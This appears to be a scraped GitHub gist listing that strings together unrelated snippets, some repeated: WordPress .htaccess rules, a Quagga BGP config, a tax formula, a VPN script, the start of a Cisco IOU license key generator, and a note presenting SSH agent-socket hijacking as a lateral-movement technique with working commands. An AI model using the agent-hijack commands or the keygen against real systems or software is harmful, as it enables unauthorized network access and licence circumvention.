IntuitiveNZ jasontomasi

## SSH Agent Forwarding.md

      
              1 file
            
          
              10 forks
            
          
              11 comments
            
          
              91 stars
            
          
                int0x80
                / SSH Agent Forwarding.md
            
            
              Created
              January 7, 2021 00:59
            
          
    Here's one of my favorite techniques for lateral movement: SSH agent forwarding. Use a UNIX-domain socket to advance your presence on the network. No need for passwords or keys.
root@bastion:~# find /tmp/ssh-* -type s
/tmp/ssh-srQ6Q5UpOL/agent.1460

root@bastion:~# SSH_AUTH_SOCK=/tmp/ssh-srQ6Q5UpOL/agent.1460 ssh user@internal.company.tld

user@internal:~$ hostname -f
internal.company.tld

  
## bgpd.conf
#@ /etc/quagga/bgpd.conf (Centos & Ubuntu)

hostname <Local OS hostname>
password <Any random phrase>
enable password <Any random phrase>
!
log file /var/log/quagga/bgpd
!debug bgp events
!debug bgp zebra
debug bgp updates

## CiscoKeyGen.py
#! /usr/bin/python
print "\n*********************************************************************"
print "Cisco IOU License Generator - Kal 2011, python port of 2006 C version"
import os
import socket
import hashlib
import struct
# get the host id and host name to calculate the hostkey
hostid=os.popen("hostid").read().strip()
hostname = socket.gethostname()

## .htacces
<files wp-config.php>
order allow,deny
deny from all
</files>

# Block the include-only files.
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^wp-admin/includes/ - [F,L]

## gist:6724333
=IF(B2<=14000,SUM(B2*10.5%),IF(B2<=48000,SUM(B2-14000)*17.5%+1470,IF(B2<=70000,SUM(B2-48000)*30%+7420,IF(B2>=70001,SUM(B2-70000)*33%+14020))))

## simplevpn
#!/bin/bash

# Setup encrypted IPv4 tunnel over IPv4 or IPv6 on two Linux nodes using SSH for tunnel setup.
# Requires only ipsec-tools, iproute2, ssh and necessry kernel modules locally and remotely.

# Warning: it flushes IPsec settings both locally and remotely.
# Don't use with other IPsec tunnnels.

# Sample usage:
# simplevpn -6 fc::1 fc::2    ssh -T root@fc::2

## Wordpress .HTACCESS file
# canonical redirect to no www
RewriteEngine On
RewriteCond %{HTTP_HOST} ^www\.(.+)$ [NC]
RewriteRule ^(.*)$ http://%1/$1 [R=301,L]

# protect wp-config at all cost
<files wp-config.php>
Order deny,allow
deny from all
</files>
	#@ /etc/quagga/bgpd.conf (Centos & Ubuntu)

	hostname <Local OS hostname>
	password <Any random phrase>
	enable password <Any random phrase>
	!
	log file /var/log/quagga/bgpd
	!debug bgp events
	!debug bgp zebra
	debug bgp updates
	#! /usr/bin/python
	print "\n*********************************************************************"
	print "Cisco IOU License Generator - Kal 2011, python port of 2006 C version"
	import os
	import socket
	import hashlib
	import struct
	# get the host id and host name to calculate the hostkey
	hostid=os.popen("hostid").read().strip()
	hostname = socket.gethostname()
	<files wp-config.php>
	order allow,deny
	deny from all
	</files>

	# Block the include-only files.
	<IfModule mod_rewrite.c>
	RewriteEngine On
	RewriteBase /
	RewriteRule ^wp-admin/includes/ - [F,L]
	#!/bin/bash

	# Setup encrypted IPv4 tunnel over IPv4 or IPv6 on two Linux nodes using SSH for tunnel setup.
	# Requires only ipsec-tools, iproute2, ssh and necessry kernel modules locally and remotely.

	# Warning: it flushes IPsec settings both locally and remotely.
	# Don't use with other IPsec tunnnels.

	# Sample usage:
	# simplevpn -6 fc::1 fc::2 ssh -T root@fc::2
	# canonical redirect to no www
	RewriteEngine On
	RewriteCond %{HTTP_HOST} ^www\.(.+)$ [NC]
	RewriteRule ^(.*)$ http://%1/$1 [R=301,L]

	# protect wp-config at all cost
	<files wp-config.php>
	Order deny,allow
	deny from all
	</files>